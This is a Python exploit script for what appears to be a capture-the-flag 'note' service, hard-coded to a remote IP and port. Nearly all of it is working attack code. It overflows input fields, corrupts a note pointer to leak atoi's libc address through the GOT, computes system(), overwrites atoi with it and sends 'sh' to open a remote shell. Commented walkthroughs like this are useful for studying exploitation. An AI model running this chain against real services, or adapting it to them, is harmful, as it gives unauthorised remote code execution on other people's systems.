from threading import Thread
from zio import *
# Path of the local challenge binary, kept for debugging against an offline
# copy. It is immediately shadowed by the remote endpoint assigned on the next
# line, so swap/comment the two lines to switch between local and remote runs.
target = './note'
# Remote challenge endpoint as (host, port); this is what exp(target) receives.
target = ('114.215.220.77', 10001)
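def interact(io):
    """Hand the connection over to the user for an interactive session.

    A background thread keeps draining whatever the remote side sends (the
    zio object created in exp() is configured with ``print_read``, which is
    what echoes that data to the terminal); the calling thread forwards each
    non-empty line typed on stdin with ``io.writeline``.

    Returns when stdin is closed (EOF / Ctrl-D). The reader thread is a
    daemon, so it cannot keep the process alive once the main thread exits.
    KeyboardInterrupt is deliberately not caught and propagates as before.
    """
    def run_recv():
        # Poll the connection in 1-second slices. zio is expected to raise
        # once the peer goes away, which is the signal to stop; only
        # Exception is caught (not a bare except) so SystemExit and friends
        # are never swallowed.
        while True:
            try:
                io.read_until_timeout(timeout=1)
            except Exception:
                return

    t1 = Thread(target=run_recv)
    t1.daemon = True  # attribute form works on Python 2 and 3
    t1.start()

    while True:
        try:
            d = raw_input()
        except EOFError:
            # stdin closed: nothing more to forward, let the script end.
            return
        if d != '':
            io.writeline(d)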
def add(io, length, buff):
    """Menu option 1: create a note of ``length`` bytes containing ``buff``.

    Drives the remote menu prompt by prompt: waits for the ``'--->>'`` menu
    marker, then for the two ``':'`` prompts (size, then content), answering
    each with ``io.writeline``. ``buff`` is sent exactly as given; nothing
    here checks it against ``length``.
    """
    dialogue = (
        ('--->>', '1'),       # main menu: "add"
        (':', str(length)),   # size prompt
        (':', buff),          # content prompt
    )
    for prompt, reply in dialogue:
        io.read_until(prompt)
        io.writeline(reply)
def edit(io, id, buff):
    """Menu option 3 on note ``id``: answer '2' at the 'append' prompt, then
    send ``buff`` at the content prompt.

    The service's sub-menu offers '1' and '2' after the word 'append'; which
    one overwrites and which appends is not visible from this script.
    edit2() is the otherwise identical variant that answers '1'.
    """
    steps = [
        ('--->>', '3'),     # main menu: "edit"
        ('id', str(id)),    # note index
        ('append', '2'),    # edit-mode sub-menu
        (':', buff),        # new content
    ]
    for prompt, reply in steps:
        io.read_until(prompt)
        io.writeline(reply)
def edit2(io, id, buff):
    """Menu option 3 on note ``id``: answer '1' at the 'append' prompt, then
    send ``buff`` at the content prompt.

    Same dialogue as edit() apart from the '1' sub-option; exp() uses this
    variant for the final write of the system() address.
    """
    def answer(prompt, reply):
        # Block until the service prints `prompt`, then send `reply`.
        io.read_until(prompt)
        io.writeline(reply)

    answer('--->>', '3')
    answer('id', str(id))
    answer('append', '1')
    answer(':', buff)
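def show(io, id):
    """Menu option 2: display note ``id`` and return its content as a qword.

    The service answers with a line ending in ``is <content>``; the bytes
    after ``'is '`` up to the newline are decoded as a little-endian 64-bit
    integer. A leaked user-space pointer has its two high bytes zero, so the
    line is usually shorter than 8 bytes and is right-padded with NULs; any
    bytes beyond the eighth are dropped so an over-long line cannot make
    struct.unpack raise.

    exp() calls this after pointing a note at atoi's GOT slot and treats the
    result as atoi's address in libc.

    Note: the original listing had its backslashes stripped (``strip('\\n')``
    split over two lines, ``ljust(8, 'x00')``); the escapes are restored
    here, and bytes literals are used so the function also works under
    Python 3 where zio returns bytes.
    """
    import struct

    io.read_until('--->>')
    io.writeline('2')
    io.read_until('id')
    io.writeline(str(id))
    io.read_until('is ')
    leaked = io.readline().strip(b'\n')
    # Pad short leaks with NULs, truncate anything longer than a qword.
    qword = leaked.ljust(8, b'\x00')[:8]
    return struct.unpack('<Q', qword)[0]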
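def exp(target, atoi_off=0x36e80, system_off=0x45390):
    """Exploit ``target`` and hand the resulting session to the user.

    ``target`` is anything zio accepts: a local binary path or a
    ``(host, port)`` tuple. ``atoi_off`` / ``system_off`` are the offsets of
    atoi and system inside the remote libc; the defaults are the values the
    author used against this service and must be replaced for a different
    libc build.

    What the code sends, in order (the interpretation follows the author's
    original note and is not verified here):
      1. Answers the 'name' prompt with 0x30 filler bytes plus the qwords 0
         and 0x70, and the 'address' prompt with the same two qwords.
      2. Creates note 0 (size 128, 94 content bytes) and edits it with a
         38-byte write ending in l32(0x6020E0 + 0x40), an address in what is
         presumably the non-PIE binary's data segment.
      3. Creates a second note whose content is atoi's GOT address 0x602088;
         per the author's note this lands in the note-pointer slot, so
         show(io, 0) then prints atoi's runtime address.
      4. Rebases libc from that leak and derives system().
      5. Writes system's address back through edit2() (the '1' sub-option)
         and sends 'sh' at the menu prompt, which presumably reaches the
         overwritten atoi() as system("sh"); interact() then takes over.
    """
    io = zio(target, timeout=10000,
             print_read=COLORED(RAW, 'red'),
             print_write=COLORED(RAW, 'green'))

    # Step 1: overflow the name/address fields.
    io.read_until('name')
    io.write('a' * 0x30 + l64(0) + l64(0x70))
    io.read_until('address')
    io.writeline(l64(0) + l64(0x70))

    # Step 2: first note, then corrupt it with a pointer into the binary.
    add(io, 128, 94 * 'a')
    # io.gdb_hint()  # uncomment to attach gdb when running locally
    edit(io, 0, 'b' * 33 + 'c' + l32(0x6020E0 + 0x40))

    # Step 3 -- author's note (translated from Chinese): overflow the address
    # first, then add a new note; what gets written is the address of the
    # note-array pointer. Fill that location with atoi's GOT address so that
    # "show" prints atoi's libc address -- the leak.
    atoi_got = 0x602088
    add(io, 0x60, l64(atoi_got))
    atoi_addr = show(io, 0)

    # Step 4: rebase libc from the leak. print(...) with one argument behaves
    # the same on Python 2 and 3.
    base = atoi_addr - atoi_off
    print(hex(base))
    system = base + system_off
    print(hex(system))

    # Step 5: GOT overwrite and trigger.
    edit2(io, 0, l64(system))
    io.read_until('--->>')
    io.writeline('sh')
    interact(io)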
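if __name__ == '__main__':
    # Fire the exploit only when run as a script, so the helper functions can
    # be imported (e.g. into an interactive session) without connecting out.
    exp(target)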